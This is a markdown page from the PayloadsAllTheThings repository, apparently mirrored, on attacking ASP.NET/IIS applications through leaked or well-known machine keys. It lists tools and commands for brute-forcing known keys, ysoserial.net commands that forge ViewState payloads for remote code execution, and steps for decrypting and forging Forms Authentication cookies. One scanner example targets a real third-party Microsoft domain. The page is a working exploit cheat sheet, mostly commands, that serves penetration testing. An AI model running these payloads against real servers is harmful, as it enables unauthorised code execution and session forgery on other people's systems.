iis-machine-keys.md (12553B)
1 --- 2 title: "IIS Machine Keys" 3 topic: "API Key Leaks" 4 topicSlug: "api-key-leaks" 5 sourcePath: "API Key Leaks/IIS-Machine-Keys.md" 6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/API%20Key%20Leaks/IIS-Machine-Keys.md" 7 sha: "3ac27901c711" 8 isReadme: false 9 --- 10 11 # IIS Machine Keys 12 13 > That machine key is used for encryption and decryption of forms authentication cookie data and view-state data, and for verification of out-of-process session state identification. 14 15 ## Summary 16 17 * [Viewstate Format](#viewstate-format) 18 * [Machine Key Format And Locations](#machine-key-format-and-locations) 19 * [Identify Known Machine Key](#identify-known-machine-key) 20 * [Decode ViewState](#decode-viewstate) 21 * [Generate ViewState For RCE](#generate-viewstate-for-rce) 22 * [MAC Is Not Enabled](#mac-is-not-enabled) 23 * [MAC Is Enabled And Encryption Is Disabled](#mac-is-enabled-and-encryption-is-disabled) 24 * [MAC Is Enabled And Encryption Is Enabled](#mac-is-enabled-and-encryption-is-enabled) 25 * [Edit Cookies With The Machine Key](#edit-cookies-with-the-machine-key) 26 * [References](#references) 27 28 ## Viewstate Format 29 30 ViewState in IIS is a technique used to retain the state of web controls between postbacks in ASP.NET applications. It stores data in a hidden field on the page, allowing the page to maintain user input and other state information. 31 32 | Format | Properties | 33 | ------------------ | ------------------------------------------------------------ | 34 | Base64 | `EnableViewStateMac=False`, `ViewStateEncryptionMode=False` | 35 | Base64 + MAC | `EnableViewStateMac=True` | 36 | Base64 + Encrypted | `ViewStateEncryptionMode=True` | 37 38 By default until Sept 2014, the `enableViewStateMac` property was to set to `False`. 39 Usually unencrypted viewstate are starting with the string `/wEP`. 40 41 ## Machine Key Format And Locations 42 43 A machineKey in IIS is a configuration element in ASP.NET that specifies cryptographic keys and algorithms used for encrypting and validating data, such as view state and forms authentication tokens. It ensures consistency and security across web applications, especially in web farm environments. 44 45 The format of a machineKey is the following. 46 47 ```xml 48 <machineKey validationKey="[String]" decryptionKey="[String]" validation="[SHA1 (default) | MD5 | 3DES | AES | HMACSHA256 | HMACSHA384 | HMACSHA512 | alg:algorithm_name]" decryption="[Auto (default) | DES | 3DES | AES | alg:algorithm_name]" /> 49 ``` 50 51 The `validationKey` attribute specifies a hexadecimal string used to validate data, ensuring it hasn't been tampered with. 52 53 The `decryptionKey` attribute provides a hexadecimal string used to encrypt and decrypt sensitive data. 54 55 The `validation` attribute defines the algorithm used for data validation, with options like SHA1, MD5, 3DES, AES, and HMACSHA256, among others. 56 57 The `decryption` attribute specifies the encryption algorithm, with options like Auto, DES, 3DES, and AES, or you can specify a custom algorithm using alg:algorithm_name. 58 59 The following example of a machineKey is from [Microsoft documentation](https://docs.microsoft.com/en-us/iis/troubleshoot/security-issues/troubleshooting-forms-authentication). 60 61 ```xml 62 <machineKey validationKey="87AC8F432C8DB844A4EFD024301AC1AB5808BEE9D1870689B63794D33EE3B55CDB315BB480721A107187561F388C6BEF5B623BF31E2E725FC3F3F71A32BA5DFC" decryptionKey="E001A307CCC8B1ADEA2C55B1246CDCFE8579576997FF92E7" validation="SHA1" /> 63 ``` 64 65 Common locations of **web.config** / **machine.config** 66 67 * 32-bits 68 * `C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\machine.config` 69 * `C:\Windows\Microsoft.NET\Framework\v4.0.30319\config\machine.config` 70 * 64-bits 71 * `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\config\machine.config` 72 * `C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\machine.config` 73 * in the registry when **AutoGenerate** is enabled (extract with [irsdl/machineKeyFinder.aspx](https://gist.github.com/irsdl/36e78f62b98f879ba36f72ce4fda73ab)) 74 * `HKEY_CURRENT_USER\Software\Microsoft\ASP.NET\4.0.30319.0\AutoGenKeyV4` 75 * `HKEY_CURRENT_USER\Software\Microsoft\ASP.NET\2.0.50727.0\AutoGenKey` 76 77 ## Identify Known Machine Key 78 79 Try multiple machine keys from known products, Microsoft documentation, or other part of the Internet. 80 81 * [isclayton/viewstalker](https://github.com/isclayton/viewstalker) 82 83 ```powershell 84 ./viewstalker --viewstate /wEPD...TYQ== -m 3E92B2D6 -M ./MachineKeys2.txt 85 ____ ____.__ __ .__ __ 86 \ \ / /|__| ______ _ _________/ |______ | | | | __ ___________ 87 \ Y / | |/ __ \ \/ \/ / ___/\ __\__ \ | | | |/ // __ \_ __ \ 88 \ / | \ ___/\ /\___ \ | | / __ \| |_| <\ ___/| | \/ 89 \___/ |__|\___ >\/\_//____ > |__| (____ /____/__|_ \\___ >__| 90 \/ \/ \/ \/ \/ 91 92 KEY FOUND!!! 93 Host: 94 Validation Key: XXXXX,XXXXX 95 ``` 96 97 * [blacklanternsecurity/badsecrets](https://github.com/blacklanternsecurity/badsecrets) 98 99 ```ps1 100 python examples/blacklist3r.py --viewstate /wEPDwUK...j81TYQ== --generator 3E92B2D6 101 Matching MachineKeys found! 102 validationKey: C50B3C89CB21F4F1422FF158A5B42D0E8DB8CB5CDA1742572A487D9401E3400267682B202B746511891C1BAF47F8D25C07F6C39A104696DB51F17C529AD3CABE validationAlgo: SHA1 103 ``` 104 105 * [irsdl/crapsecrets](https://github.com/irsdl/crapsecrets) 106 107 ```ps1 108 python3 ./crapsecrets/examples/cli.py -u http://update.microsoft.com/ -r 109 python3 ./crapsecrets/examples/cli.py -u http://update.microsoft.com/ -mrd 5 110 python3 ./crapsecrets/examples/cli.py -mrd 5 -avsk -fvsp -u http://update.microsoft.com/ 111 python3 ./crapsecrets/examples/cli.py -mrd 5 -avsk -fvsp -mkf ./local/aspnet_machinekeys_local.txt -u http://10.10.10.10:8080/ 112 python3 ./crapsecrets/examples/cli.py -mrd 5 -avsk -fvsp -mkf ./local/aspnet_machinekeys_local.txt -mkf ./crapsecrets/resources/aspnet_machinekeys.txt -u http://10.10.10.10:8080/a1/b/c1/ 113 ``` 114 115 * [NotSoSecure/Blacklist3r](https://github.com/NotSoSecure/Blacklist3r) 116 117 ```powershell 118 AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata /wEPDwUKLTkyMTY0MDUxMg9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkbdrqZ4p5EfFa9GPqKfSQRGANwLs= --purpose=viewstate --valalgo=sha1 --decalgo=aes --modifier=CA0B0334 --macdecode --legacy 119 ``` 120 121 * [0xacb/viewgen](https://github.com/0xacb/viewgen) 122 123 ```powershell 124 $ viewgen --guess "/wEPDwUKMTYyOD...WRkuVmqYhhtcnJl6Nfet5ERqNHMADI=" 125 [+] ViewState is not encrypted 126 [+] Signature algorithm: SHA1 127 ``` 128 129 List of interesting machine keys to use: 130 131 * [NotSoSecure/Blacklist3r/MachineKeys.txt](https://github.com/NotSoSecure/Blacklist3r/raw/f10304bc90efaca56676362a981d93cc312d9087/MachineKey/AspDotNetWrapper/AspDotNetWrapper/Resource/MachineKeys.txt) 132 * [isclayton/viewstalker/MachineKeys2.txt](https://raw.githubusercontent.com/isclayton/viewstalker/main/MachineKeys2.txt) 133 * [blacklanternsecurity/badsecrets/aspnet_machinekeys.txt](https://raw.githubusercontent.com/blacklanternsecurity/badsecrets/dev/badsecrets/resources/aspnet_machinekeys.txt) 134 135 ## Decode ViewState 136 137 * [BApp Store > ViewState Editor](https://portswigger.net/bappstore/ba17d9fb487448b48368c22cb70048dc) - ViewState Editor is an extension that allows you to view and edit the structure and contents of V1.1 and V2.0 ASP view state data. 138 * [0xacb/viewgen](https://github.com/0xacb/viewgen) 139 140 ```powershell 141 viewgen --decode --check --webconfig web.config --modifier CA0B0334 "zUylqfbpWnWHwPqet3cH5Prypl94LtUPcoC7ujm9JJdLm8V7Ng4tlnGPEWUXly+CDxBWmtOit2HY314LI8ypNOJuaLdRfxUK7mGsgLDvZsMg/MXN31lcDsiAnPTYUYYcdEH27rT6taXzDWupmQjAjraDueY=" 142 ``` 143 144 ## Generate ViewState For RCE 145 146 First you need to decode the Viewstate to know if the MAC and the encryption are enabled. 147 148 **Requirements**: 149 150 * `__VIEWSTATE` 151 * `__VIEWSTATEGENERATOR` 152 153 ### MAC Is Not Enabled 154 155 ```ps1 156 ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "cmd /c whoami" 157 ``` 158 159 ### MAC Is Enabled And Encryption Is Disabled 160 161 * Find the machine key (validationkey) using `badsecrets`, `viewstalker`, `AspDotNetWrapper.exe` or `viewgen` 162 163 ```ps1 164 AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata /wEPDwUKLTkyMTY0MDUxMg9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkbdrqZ4p5EfFa9GPqKfSQRGANwLs= --purpose=viewstate --valalgo=sha1 --decalgo=aes --modifier=CA0B0334 --macdecode --legacy 165 # --modifier = `__VIEWSTATEGENERATOR` parameter value 166 # --encrypteddata = `__VIEWSTATE` parameter value of the target application 167 ``` 168 169 * Then generate a ViewState using [pwntester/ysoserial.net](https://github.com/pwntester/ysoserial.net), both `TextFormattingRunProperties` and `TypeConfuseDelegate` gadgets can be used. 170 171 ```ps1 172 .\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "cmd /c whoami" --generator=CA0B0334 --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45" 173 .\ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "cmd /c whoami" --generator=3E92B2D6 --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45" 174 175 # --generator = `__VIEWSTATEGENERATOR` parameter value 176 # --validationkey = validation key from the previous command 177 ``` 178 179 ### MAC Is Enabled And Encryption Is Enabled 180 181 Default validation algorithm is `HMACSHA256` and the default decryption algorithm is `AES`. 182 183 If the `__VIEWSTATEGENERATOR` is missing but the application uses .NET Framework version 4.0 or below, you can use the root of the app (e.g: `--apppath="/testaspx/"`). 184 185 * **.NET Framework < 4.5**, ASP.NET always accepts an unencrypted `__VIEWSTATE` if you remove the `__VIEWSTATEENCRYPTED` parameter from the request 186 187 ```ps1 188 .\ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "cmd /c whoami" --apppath="/testaspx/" --islegacy --validationalg="SHA1" --validationkey="70DBADBFF4B7A13BE67DD0B11B177936F8F3C98BCE2E0A4F222F7A769804D451ACDB196572FFF76106F33DCEA1571D061336E68B12CF0AF62D56829D2A48F1B0" --isdebug 189 ``` 190 191 * **.NET Framework > 4.5**, the machineKey has the property: `compatibilityMode="Framework45"` 192 193 ```ps1 194 .\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "cmd /c whoami" --path="/somepath/testaspx/test.aspx" --apppath="/testaspx/" --decryptionalg="AES" --decryptionkey="34C69D15ADD80DA4788E6E3D02694230CF8E9ADFDA2708EF43CAEF4C5BC73887" --validationalg="HMACSHA256" --validationkey="70DBADBFF4B7A13BE67DD0B11B177936F8F3C98BCE2E0A4F222F7A769804D451ACDB196572FFF76106F33DCEA1571D061336E68B12CF0AF62D56829D2A48F1B0" 195 ``` 196 197 ## Edit Cookies With The Machine Key 198 199 If you have the `machineKey` but the viewstate is disabled. 200 201 ASP.net Forms Authentication Cookies : [liquidsec/aspnetCryptTools](https://github.com/liquidsec/aspnetCryptTools) 202 203 ```powershell 204 # decrypt cookie 205 $ AspDotNetWrapper.exe --keypath C:\MachineKey.txt --cookie XXXXXXX_XXXXX-XXXXX --decrypt --purpose=owin.cookie --valalgo=hmacsha512 --decalgo=aes 206 207 # encrypt cookie (edit Decrypted.txt) 208 $ AspDotNetWrapper.exe --decryptDataFilePath C:\DecryptedText.txt 209 ``` 210 211 ## References 212 213 * [Deep Dive into .NET ViewState Deserialization and Its Exploitation - Swapneil Kumar Dash - October 22, 2019](https://web.archive.org/web/20250916225422/https://swapneildash.medium.com/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817) 214 * [Exploiting Deserialisation in ASP.NET via ViewState - Soroush Dalili - April 23, 2019](https://web.archive.org/web/20250806010506/https://soroush.me/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/) 215 * [Exploiting ViewState Deserialization using Blacklist3r and YSoSerial.Net - Claranet - June 13, 2019](https://web.archive.org/web/20250810191756/https://www.claranet.com/us/blog/2019-06-13-exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserialnet) 216 * [Project Blacklist3r - @notsosecure - November 23, 2018](https://web.archive.org/web/20260116051627/https://notsosecure.com/project-blacklist3r) 217 * [View State, The Unpatchable IIS Forever Day Being Actively Exploited - Zeroed - July 21, 2024](https://web.archive.org/web/20260107194152/https://zeroed.tech/blog/viewstate-the-unpatchable-iis-forever-day-being-actively-exploited/)